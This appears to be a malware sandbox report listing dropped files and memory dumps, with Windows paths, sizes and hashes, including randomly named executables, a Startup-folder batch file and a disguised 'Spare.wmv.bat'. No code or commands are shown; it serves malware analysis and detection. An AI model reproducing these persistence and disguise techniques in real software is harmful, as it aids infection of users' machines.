C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe

Filesize
1.8MB

MD5
4ffd0bca9cd50d388b2aa181ead35e1c

SHA1
536af1ccd96a29ef97dbf219a250c4e5a0bfad54

SHA256
96264994c4909d2c24fa848cb5a2fafb86b131ff7a4b2dacd7858fb5da6b4906

SHA512
148d4d0203fe55f134a53082372055da213ddbe148c06f6c97fd056870db1b0d4eb657a62341b5d0c53e4925f592efa4717c29086498072a2f4fa0b9077f7014

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IUD94ZRE\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
32ef5561a7fb04aace02c9eb4026c731

SHA1
0072f2081a3c9b9fb7ca06177317b7fb6414f615

SHA256
06a3dc42c5b2f4814f1e9043cb1aecd9d6b16fc61298c6b6ef41874cdcdff1fd

SHA512
7067316206391f4c00a16ef26db0b4d449b618b4542d1842e2a5b573384f3718acc63737c5df99cf5efa51dc13b4a4bfa3da18ebd24ea44f70ad189474e1e907

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b3cdfd1695b9b5d05e5d4e6062dca7f5

SHA1
e11473917ff380d25870e44aa9c5d8bc3140a8d9

SHA256
204ed27740509f504cc46b7a62debcc3511e52872dbd8df423bcfd8df4340747

SHA512
8bbd12b47debfa606cfa9fce3289257b560dffca18b14d2c28faeff546b402296d79808ac7ae5184100b96c08d2f97d42f636aa8fe1d3dd9be23525083b398f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3551e9ff55d5537f9ea56a005ee50980

SHA1
1a07bbde3b68bc5902b9f65731091e99c80597b9

SHA256
691b5352f9a332005efeca817957a50743767c8b1cd12cc0277154bc9d1d68fc

SHA512
3466c7760c306d933999a075f86a6fca77dac16b8b023b24007c55381b9fdd778858509acc1ffad2b2a7c511fb32579a6aa88108da1ec51ec34b2cacf6d279a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f29de5dab047294efd71671b64b27caf

SHA1
367a7311c0e8c6a79746e47def472ac2432dd774

SHA256
f8c6a8ee43db859f60c3106077b403561e31ef3b28bff8ff9f285bb475b4e59d

SHA512
60e719db7a31e82204fdc4973cdb7f58e55bd6cb798f4e90eb6c07af1527d334eacc846b082764b03d9946a8aa0d8c3cf9a349f8609093befd4655986c02a1ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299560101\adee9986a1.exe

Filesize
4.4MB

MD5
82f36a6491e9fb263a7f97bb40e321c5

SHA1
7066e28244b49ff8391297ee36b5b809a1915ef5

SHA256
7f76a00b16031177efb239ae2c702f30e8a891416b9a77f2583733a7b84f1cdd

SHA512
b9a12ab56c90494fbd539e06e160c793a0b3b2757e28a25ac8bc41c14433d7f1c22b4d76e624ae0ad77df31df4577a2ca5a5d65c5ffe59c18b6d82bc44eb12ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299570101\laf6w_001.exe

Filesize
1.3MB

MD5
eb3f82a230c97746ad6fc272582ecece

SHA1
618bac114606764b85c734803007309660b76cf0

SHA256
2fdc0a416cdb38a430a54ea70de97e9c9c5968432e0057725aafdba803f278f2

SHA512
9e8ef67c90ec573cf7791d03b0e158e8323060edffb418fa3a4f22726848020fd194b6f83767cb8a3f54cfcff2ab901cb369f03de49fe686fba2a06265e4622e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299580101\fd01a1419e.exe

Filesize
1.1MB

MD5
999c92338f2c92dd095a74f0581fe012

SHA1
62d53a745cc4d83a0d00a865cf7f2ec28fb84b1b

SHA256
b28e8a5c04dbfcbf462014aedc83bafec26d0eedebefca620b740df26cb09700

SHA512
a94b4ba0c4677d0ac231f0047a1eb7556bf7b36b7bcda896782711ff3bb52800ab26f28fe36ef2d445dce3134d5ce8c024466451dd1e58842b5ebbe7e35a70e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299590101\eBOjg2u.exe

Filesize
196KB

MD5
1b129d080655a4c9f703a5dce0195512

SHA1
9ec187c55fc3f50d98c372a96913fd38462c4ebf

SHA256
ee5c9b3dc922c0d16fd7a1e1d72c3530f9aee1209a233764f8280ee7dbc3b353

SHA512
09124bae1f5bf9df253b7551188e23b6ad29917c92ace51461987009606b88eedcc6a48f501307ef40127f5877f187549c93574e89435d393e7ae40555b98da5

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299620101\weC48Q7.exe

Filesize
11.5MB

MD5
cc856b95bb94ebdeca5170a374122702

SHA1
2f1e0cfd433fc3d05ffd525ce4f756263e2772fc

SHA256
2351b77ceb3664e9045e797d2eb8a00300f795ea2ec99a81bc05156b6d695085

SHA512
006b849c4ad2fbd549bd00deaa42976a521c54ce254584b7696ac901c55a543548da069f3cfcc404f7827f73504d5d9f69315770de2ef0b8bd530f2e02bac37b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299630101\Kr9UTz2.exe

Filesize
1.1MB

MD5
8eeae510143fa985cf13e86572e5b233

SHA1
ed02dc29d94e06513dcc83999bb671f1029a138e

SHA256
a435418bea7cfbe38ae7a91542d66ffc28a674a5551b4eefc15ed50ec7d64ad6

SHA512
492517a117448e9b2e2f30975f787681c6d70285425891a3b6d2533debedf77b9195667625fbaf45eb0877a2e0c27d32956de0de5a9444828fdb79e9ddc7e507

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299640101\zx4PJh6.exe

Filesize
1.4MB

MD5
06b18d1d3a9f8d167e22020aeb066873

SHA1
2fe47a3dbcbe589aa64cb19b6bbd4c209a47e5aa

SHA256
34b129b82df5d38841dc9978746790673f32273b07922c74326e0752a592a579

SHA512
e1f47a594337291cddff4b5febe979e5c3531bd81918590f25778c185d6862f8f7faa9f5e7a35f178edc1666d1846270293472de1fc0775abb8ae10e9bda8066

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299650101\50KfF6O.exe

Filesize
3.2MB

MD5
9ec5cf784ec23ca09c2921668912cfeb

SHA1
4b9c8b0d197c359368164e5738b44a65fba40741

SHA256
56bd8367607b32bfe275478f96bbd0fe213c07eee696e0a268f817ea757a9543

SHA512
043d623ae8f3dbb43b504ba08d916f27f9054c4df46c6b5d0ae56e98c44b919e8d9a05e333c08adad286353bf5f6f1b75c1ee23f819462654c94e1542c31c464

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299670141\4wAPcC0.ps1

Filesize
275B

MD5
c203adcd3b4b1717be1e79d7d234f89c

SHA1
a0c726c32766f5d3e3de1bdc9998da2bb2a657e4

SHA256
bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8

SHA512
724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299680101\ARxx7NW.exe

Filesize
677KB

MD5
ff82cf635362a10afeca8beb04d22a5f

SHA1
89a88d6058bc52df34bab2fc3622ede8d0036840

SHA256
9a527eb9bd0239a1619632d2ca9d8a60096ad77986a430b1bad2f9e87f126c4a

SHA512
66e423011be69a12d5e74586311ea487215f1edf73199ac065abccf248e361e2c74ba18255c38d3724764a379ab84bdfee10e75665d848a9edfb1ef48373ffa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299690101\wjfOfXh.exe

Filesize
4.9MB

MD5
c909efcf6df1f5cab49d335588709324

SHA1
43ace2539e76dd0aebec2ce54d4b2caae6938cd9

SHA256
d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

SHA512
68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299700101\k3t05Da.exe

Filesize
5.9MB

MD5
5cfc96efa07e34454e5a80a3c0202c98

SHA1
65804d32dc3694e8ec185051809a8342cf5d5d99

SHA256
fb0fe7e716caf3e0dcb1fbb6824466f807aa85295bfc7ed7046febf3331dab88

SHA512
1965ddab497907e3bf24f656f1085117c3f57c830e11c54068914df9d41de477eb6d23154ee0b7bd7781081aa7046390c9eccc2c80dbdfd3eb2693eef4ea1e01

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299710101\d3jhg_003.exe

Filesize
1.3MB

MD5
5e9850567a55510d96b2c8844b536348

SHA1
afcf6d89d3a59fa3a261b54396ee65135d3177f0

SHA256
9f4190eb91c5241d0c41a77e1c12fe2dde01e67ef201b8032ada230333e2ae81

SHA512
7d8a03e39567a05e5945ca9e3401d31c302a2ff0448da4cd9804f62982a9247728552264e51dc8ce2390706874b4050e4598bdb2df076ef4407d9d31376d5fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299730101\3db017541a.exe

Filesize
1.7MB

MD5
b3fddedb73838f921c12944e1023e872

SHA1
0cd9343fa6e019c8b67ea7b3c7b4ea1338344f00

SHA256
68316b2fc29b4b1d4126e6f6c6de5d4f9e01b674ae106d2e15675dd9b9b9b045

SHA512
f30e1e94dbb25beb80c279aa878a77d60ed806b445087a092e506e459aa2fe099fc2b88b7d78c3641fbb5c5dcf15b62f929aebb6e5d62bd91ba558dda0e4e3a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1.bat

Filesize
16KB

MD5
f6a8b35f102210019dce8177b1df901c

SHA1
31de97b7eac8bbdf4dbd08ff8b456dd335839d0a

SHA256
1f0aee2640d4748c088bd4aa0b8bef5323add0778731fdfd3fa4d12adda1487b

SHA512
41c66b736c6d7aed2b784135eaeb4050c535414a1e0b9db09b95bccac0ff60e2c1acf98d54504530dcdd6230e52da70827fb409b6274d1d93fcf90eec8ae69ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js

Filesize
129KB

MD5
fae294beeea146fcc79c6ba258159550

SHA1
a06d7b2a63faec284d8487dcb7f1bba7f2d6b1e2

SHA256
0db879398b091aaa19fe58c398b589c47a9e78194600cfdff150c50f4ef40e31

SHA512
f1757bc2a9b0285d2b2831c70d21811aab9cdfe25659ffc2541ff8298ba50208b3c670df0cf6f823a8f92dd2e55a9412465407c14ce192d5a521d48cfa38408a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3W01C.exe

Filesize
1.7MB

MD5
44d860e17ad99ead722f26d25394d8e2

SHA1
72193fe31f5792332199da815688a101d3e82113

SHA256
4542c0a8e7ebc3398d4c944fc98400e0030995303530a547bdda78597c1118cc

SHA512
eeb3f489966d0fc39e4f8e618a0f9e82d8951a03de8048772ba6717611e730da09831c25bb629ae8c74ca23779c4e97497a1269a05d75ace6e15be9161f65455

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe

Filesize
3.7MB

MD5
280fa8ce373e82e732af095b66c67f73

SHA1
2705180c74f14df77b48ed5d95cffd7347100655

SHA256
72370b63941926fdef65737fccf5656065c7f27444b589cd00664ef0859f1870

SHA512
814541620c1566d667bf344883bfce248f7b442505cbdef82e61dcbab1c49cc7a473718990dc309e0138050b1943eb93aaee7ba900cf053d95f6a8562eff21a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe

Filesize
2.0MB

MD5
453e433ce707a2dff379af17e1a7fe44

SHA1
c95d4c253627be7f36630f5e933212818de19ed7

SHA256
ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2

SHA512
9aa5b06bf01017aa13fd57350ba627cc892246e55e5adf8d785ff8a2252da7cbc28cf5e5e4170d877e4be01538a230646cfc581873acf183f0485c66e6397fd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S4013.exe

Filesize
1.8MB

MD5
9d059643a8a966ca1cecac666a294e07

SHA1
fbb677ce675c1c54b4ecccf8b771d8f546202b4e

SHA256
7bd75edc5bd00a37de307313ea76a4761c0e28c699b8c54ca0fe132c5c0f2fda

SHA512
a464d81ed08d55b258f952e828fd83b2b8f769e54b4761ca35d2406ef45697b6a324f89aafe1d5286cc556ab72c53dac2fd44df186700d6ea987b332579c8c1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Spare.wmv.bat

Filesize
24KB

MD5
237136e22237a90f7393a7e36092ebbe

SHA1
fb9a31d2fe60dcad2a2d15b08f445f3bd9282d5f

SHA256
89d7a9aaad61abc813af7e22c9835b923e5af30647f772c5d4a0f6168ed5001f

SHA512
822de2d86b6d1f7b952ef67d031028835604969d14a76fc64af3ea15241fdb11e3e014ddd2cd8048b8fc01a416ca1f7ccc54755cb4416d14bbdfe8680e43bd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23en43vr.ico.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ebc59c84-1d9c-4057-ae09-0c701210a265\AgileDotNetRT.dll

Filesize
2.3MB

MD5
5f449db8083ca4060253a0b4f40ff8ae

SHA1
2b77b8c86fda7cd13d133c93370ff302cd08674b

SHA256
7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1

SHA512
4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
1.3MB

MD5
15bdc4bd67925ef33b926843b3b8154b

SHA1
646af399ef06ac70e6bd43afe0f978f0f51a75fd

SHA256
4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d

SHA512
eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\Bases\arkmon64.drv

Filesize
390KB

MD5
7c924dd4d20055c80007791130e2d03f

SHA1
072f004ddcc8ddf12aba64e09d7ee0ce3030973e

SHA256
406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

SHA512
ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\KVRT.exe

Filesize
2.6MB

MD5
3fb0ad61548021bea60cdb1e1145ed2c

SHA1
c9b1b765249bfd76573546e92287245127a06e47

SHA256
5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1

SHA512
38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\app_core.dll

Filesize
1.3MB

MD5
fe0964663cf9c5e4ff493198e035cc1f

SHA1
ab9b19bd0e4efa36f78d2059b4ca556521eb35cb

SHA256
ddd70011d86b8ec909295ef45f94b48b0252229b6182af9ef8a6029c30daaf39

SHA512
923cfd9143d3850357bda901f66b5292f36ff025f05b2156667873861a02d9f498a03cdb73d2c477c0055d46600628f936b70dec46d7687fe0a97cbb1c8cf0ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\app_core_meta.dll

Filesize
619KB

MD5
81172e3cf5fc6df072b45c4f1fb6eb34

SHA1
5eb293f0fe6c55e075c5ebef4d21991546f7e504

SHA256
2a272a1990a3dfa35693adf0689512b068a831283a852f8f805cb28153115f57

SHA512
8dc4b0d5593cf2c2262b2802b60672c392dfe0e1cd757a3410e5376bbe6bf6c473428a7ca0fc1c7f0d2de5f59017d8464e7789c76999b5d7b5379209b34c1813

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\config.esm

Filesize
51KB

MD5
184a351c4d532405206e309c10af1d15

SHA1
3cf49f2275f3f9bd8e385eddcdd04e3fc2a17352

SHA256
ef0b7e22d8f7bd06964969a7f2979a475ba1c9c34efccb0c3b9e03ae950c63f6

SHA512
9a1a3cb0e3713ba41f36f4f01f2151b0c04454a05c986215ed2cc42180994f90d10e031d77452a2d0ad5a78f15d8d31c327d0d1ee676789780e6483dbe5e0341

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\crls\c7e6bd7fe0e4965892ad706f0d2f42e88789b8041daf5b3eea9ca41785297798

Filesize
367B

MD5
9cf88048f43fe6b203cf003706d3c609

SHA1
5a9aa718eb5369d640bf6523a7de17c09f8bfb44

SHA256
4bdbe6ea7610c570bc481e23c45c38d61e8b45062e305356108fd21f384b75bb

SHA512
1d0b42f31911ec8bd8eecc333674863794cfa2b97964cb511132f01a98afd0417b35423fb12461b10a786054f144e598f17d7546a1b17acc6c7efbce5f6f619e

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\crypto_components_meta.dll

Filesize
61KB

MD5
3d9d1753ed0f659e4db02e776a121862

SHA1
031fb78fe7dc211fe9e0dc8ba0027c14e84cd07f

SHA256
b6163ec9d4825102e3d423e02fb026259a6a17e7d7696ae060ec2b0ba97f54f2

SHA512
e1f50513db117c32505944bfb19fd3185b3231b6bd9f0495942bd9e80dd0f54ab575f1a2fca5e542174d3abe4106a9b5448d924c690e8548cd43aa77f6497c92

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\dbghelp.dll

Filesize
1.2MB

MD5
4003e34416ebd25e4c115d49dc15e1a7

SHA1
faf95ec65cde5bd833ce610bb8523363310ec4ad

SHA256
c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f

SHA512
88f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\dblite.dll

Filesize
703KB

MD5
98b1a553c8c5944923814041e9a73b73

SHA1
3e6169af53125b6da0e69890d51785a206c89975

SHA256
6fc0104817caa1337531c9d8b284d80052770051efb76e5829895a3854ebaec8

SHA512
8ee4467bce6495f492895a9dfaedaf85b76d6d1f67d9ff5c8c27888191c322863bc29c14ae3f505336a5317af66c31354afaeb63127e7e781f5b249f1c967363

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\dumpwriter.dll

Filesize
409KB

MD5
f56387639f201429fb31796b03251a92

SHA1
23df943598a5e92615c42fc82e66387a73b960ff

SHA256
e7eefcf569d98a5fb14a459d949756dc00faf32ed6bda1233d9d2c79ca11531c

SHA512
7bfce579b601408262c0edd342cb2cb1ef1353b6b73dce5aad540eb77f56d1184f71c56ea859bc4373aac4875b8861e2cc5d9c49518e6c40d0b2350a7ab26c0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\instrumental_services.dll

Filesize
3.4MB

MD5
c6acd1d9a80740f8a416b0a78e3fa546

SHA1
7ea7b707d58bde0d5a14d8a7723f05e04189bce7

SHA256
db8acd14ace6d4c8d4d61016debe3c0d72677416661caf0d36e7306ed020920f

SHA512
46c889f4d84e2f8dc8bfd5bdc34a346aa393fc49adcbe95bc601e6d970599f579e5cb057196061c280cbfa976989c960ac2f1830fd61c0a9166f09a6c088c20d

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\key_value_storage.dll

Filesize
158KB

MD5
9bf7f895cff1f0b9ddf5fc077bac314c

SHA1
7e9c0ce6569c6f12c57f34597b213cd4d8f55e68

SHA256
d03e0af01fbcd9ce714caf3db5ca2ab3ca4a717d5fda5c99b77e09b5672498a4

SHA512
d416cfa9446e6c92f0805278c744cf9f8ac6a2bfb96a6e0b2d65e701472ea6feaf5742ed6cef833555188a95c613499e7e14cfe5788427ec2616cfd723021a67

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\klmd.sys

Filesize
368KB

MD5
990442d764ff1262c0b7be1e3088b6d3

SHA1
0b161374074ef2acc101ed23204da00a0acaa86e

SHA256
6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

SHA512
af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\klsl.sys

Filesize
87KB

MD5
a69adedb0d47cfb23f23a9562a4405bc

SHA1
9e70576571a15aaf71106ea0cd55e0973ef2dd15

SHA256
31eaa7f1f9872c63091f4b3ec5310686b1dd1e2123af17991a6b4679eda3f62d

SHA512
77abb4435d8d445f7a29cdb8a318486a96122b5cc535da7a63da0fa920980e6ad73e78b72552f6949e66b349bbdc9aa9ea202481046e478c2829c155a1045820

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\msvcp140.dll

Filesize
439KB

MD5
5ff1fca37c466d6723ec67be93b51442

SHA1
34cc4e158092083b13d67d6d2bc9e57b798a303b

SHA256
5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

SHA512
4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\settings.kvdb

Filesize
11KB

MD5
173eee6007354de8cd873f59ffca955f

SHA1
395c5a7cb10d62cc4c63d2d65f849163e61cba5a

SHA256
17dfcf78dca415e3e7afac7519db911c0a93f36388c948aba40bcaa3176589a1

SHA512
465394c349dc74fd8a5c5ce5a89d65f0b0e09432d54517ea12de2bc8ccb329629dde03b0939800d30d008bedf0dca948fd84593bab7b7c8994ba041a7af1af2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\storage.kvdb

Filesize
6KB

MD5
1a3330c4f388360e4c2b0d94fb48a788

SHA1
127ad9be38c4aa491bd1bce6458f99a27c6d465b

SHA256
01b8d0d8c7114b59f159021384c8a59535f87018a6a136a276b5a297f54d776d

SHA512
1fcd1e99e35dc4ec972ab63299637322a27b471d02175d56409a3a114db6259f9cd767ac054c7a2bba075f36ab62f19c8118c3dda93e37b7deda05aa2b260553

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6227f2b1-7097-4b8f-bb67-c489b459747b}\vcruntime140.dll

Filesize
78KB

MD5
a37ee36b536409056a86f50e67777dd7

SHA1
1cafa159292aa736fc595fc04e16325b27cd6750

SHA256
8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

SHA512
3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

Download Submit
C:\Users\Admin\AppData\Local\Temp\{b7e41ef7-510e-4915-af75-ec4abfe317ea}\af61141f-8fec-4dcf-9163-d9a847fcef86.cmd

Filesize
695B

MD5
f65da460061a284ee51871a61e8f9121

SHA1
3048ec9da1b79b71032ec02e96802f3d8ff4b6f8

SHA256
9f40d5a67b32670256731f91820d984a7987d41d80010f872f694f28a9acbf8a

SHA512
dc2b0e11916220221be84d48fb042c8196b4b8dd6d9583575152c30ed8765862f187785c32e20a52a1475245bb15c695bf2c6519556a4843c74179224cc6e6b8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat

Filesize
229KB

MD5
a88ec7e95bc60df9126e9b22404517ac

SHA1
aca6099018834d01dc2d0f6003256ecdd3582d52

SHA256
9c256303330feb957a162d5093e7b3090d7a43f7d8818f4e33b953b319b8084e

SHA512
a1b7b57926c9365c8b4615e9c27017e7f850e918e559f81407177f3e748376b95aa3b6f72b71933922b10664d0383e2137aafff0cae3f14ab5dfbf770bacb7bc

Download Submit
C:\Windows\System32\drivers\klupd_750fb06ba_klark.sys

Filesize
355KB

MD5
9cfe1ced0752035a26677843c0cbb4e3

SHA1
e8833ac499b41beb6763a684ba60333cdf955918

SHA256
3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

SHA512
29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_750fb06ba_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_750fb06ba_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/588-45894-0x0000000000400000-0x0000000000870000-memory.dmp

Filesize
4.4MB

Download
memory/1732-15-0x0000000077254000-0x0000000077256000-memory.dmp

Filesize
8KB

Download
memory/1732-13-0x0000000000D70000-0x0000000001203000-memory.dmp

Filesize
4.6MB

Download
memory/1732-16-0x0000000000D71000-0x0000000000DDD000-memory.dmp

Filesize
432KB

Download
memory/1732-17-0x0000000000D70000-0x0000000001203000-memory.dmp

Filesize
4.6MB

Download
memory/1732-18-0x0000000000D70000-0x0000000001203000-memory.dmp

Filesize
4.6MB

Download
memory/1732-29-0x0000000000D70000-0x0000000001203000-memory.dmp

Filesize
4.6MB

Download
memory/1732-32-0x0000000000D71000-0x0000000000DDD000-memory.dmp

Filesize
432KB

Download
memory/1848-105-0x0000027763570000-0x00000277635E1000-memory.dmp

Filesize
452KB

Download
memory/1848-98-0x0000027763570000-0x00000277635E1000-memory.dmp

Filesize
452KB

Download
memory/1848-97-0x00000000004B0000-0x00000000004B2000-memory.dmp

Filesize
8KB

Download
memory/1848-106-0x0000027763570000-0x00000277635E1000-memory.dmp

Filesize
452KB

Download
memory/1848-107-0x0000027763570000-0x00000277635E1000-memory.dmp

Filesize
452KB

Download
memory/2076-95-0x0000000000400000-0x0000000000693000-memory.dmp

Filesize
2.6MB

Download
memory/2284-128-0x0000000140000000-0x0000000140403000-memory.dmp

Filesize
4.0MB

Download
memory/2284-136-0x0000000000740000-0x00000000008C8000-memory.dmp

Filesize
1.5MB

Download
memory/2284-131-0x0000000000740000-0x00000000008C8000-memory.dmp

Filesize
1.5MB

Download
memory/2284-130-0x0000000000740000-0x00000000008C8000-memory.dmp

Filesize
1.5MB

Download
